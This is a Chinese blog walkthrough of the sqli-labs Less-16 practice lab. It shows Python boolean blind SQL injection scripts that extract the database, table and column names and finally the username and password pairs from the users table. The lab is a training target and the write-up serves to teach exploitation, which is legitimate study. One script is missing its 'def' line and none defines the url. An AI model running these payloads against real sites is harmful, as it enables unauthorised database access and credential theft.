SQL注入实例(sqli-labs/less-16)

最新推荐文章于 2024-08-31 21:00:27 发布
最新推荐文章于 2024-08-31 21:00:27 发布
阅读量405 收藏 4
点赞数 6
分类专栏: sql靶场练习 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thewei666/article/details/141026791
版权

0、初始页面

1、确定闭合字符

 

2、爆库名

python脚本爆库名

def inject_database(url):
    name = ''
    for i in range(1,20):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1'\") or ascii(substr(database(),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

3、爆表名

使用python脚本

inject_database(url):
    name = ''
    for i in range(1,40):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1'\") or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

4、爆列名

使用python脚本

def inject_database(url):
    name = ''
    for i in range(1,40):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1'\") or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

5、查询最终目标

使用python脚本,查询后续的内容修改concat的范围就行

def inject_database(url):
    name = ''
    for i in range(1,20):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1'\") or ascii(substr(concat((select group_concat(username,0x3a,password) from users),1,20),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

魏大橙
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入实例sqli-labs/less-1)
Thewei666的博客
05-08 453
从网页可知传递的参数名为 id,并且为数字类型。
SQL注入实例sqli-labs/less-14)
Thewei666的博客
08-06 170
无回显,但是有报错。
SQL注入实例sqli-labs/less-13)
Thewei666的博客
08-06 179
无回显,但是有报错。
SQL注入实例sqli-labs/less-15)
Thewei666的博客
08-08 148
确定符号的闭合。
SQL注入实例sqli-labs/less-20)
Thewei666的博客
08-08 206
0、初始页面 1、确定闭合字符 2、爆库名 3、爆表名 4、爆列名 5、查询最终目标
SQL注入实例sqli-labs/less-5)
Thewei666的博客
08-05 886
在进行前两句传参时,页面没有发生任何变化,但是当使用单引号闭合时,报错了。通过报错可以确定闭合符号为单引号。
SQL注入实例sqli-labs/less-3)
Thewei666的博客
08-04 562
确定为字符型注入确定闭合字符为 ‘)
SQL注入实例sqli-labs/less-2)
Thewei666的博客
08-03 184
当没有闭合符号进行注释时,网页并没有报错,所以可以确定无闭合符号,为数值型注入。
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2541
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
SQLi-LABS Page-1(Basic Challenges)
07-24
1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并尝试构造SQL语句。 2. **Less-2** 和 **Less-3** 关卡中,学习者需要识别数字...
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 657
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
SQLi-Labs系列之GET型报错注入
ChuMeng1999的博客
10-28 376
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。
sqli-labs Less-1
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-30 268
sqli-labs Less-11.字符型SQL注入的关键是单引号的闭合2.MySQL数据库对于单引号的规则如下:3.如何判断是否是字符型注入4.猜字段数方法一:方法二:4.使用联合查询查看页面是否有显示位5.爆出数据库版本和当前数据库名6.爆出所有数据库7.爆出当前数据库所有表8.查询当前数据库users表所有字段9.查询数据 MySQL中的information_schema数据库表说明: ...
SQL经典五十道选刷
最新发布
m0_67496588的博客
08-31 425
SQL经典五十道选刷
漏洞披露-金慧-综合管理信息系统-SQL
无问社区的博客
08-27 507
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL统计行数的语句
曹昆的技术博客
08-27 375
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
SQL进阶技巧:如何查询最近一笔有效订单? | 近距离有效匹配问题
石榴姐yyds
08-29 100
本文所分析的案例在实际场景中经常被用到,对于支持lag()函数 ignore nulls语法的数据库,本问题就很简单,但对于Hive等数据库不支持该语法时,略会麻烦一些,针对本题我们采用一分为二的方式,对订单有效和无效分开求解,当为有效值时候,利用ag()函数正常求解,当为无效时候,由于会存在多个连续状态一致的,为了能够获取最近有效的状态,我们采用last_value()函数ignore nulls语法来实现,最终通过coalesce()函数将两种状态合并,得到最终的结果。
Python知识点:如何使用SQLAlchemy进行ORM(对象关系映射)
码农超哥的博客
08-31 292
定义数据库表的ORM模型。每个模型类都需要继承自Base,并且通常以类的属性形式定义表的列。
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值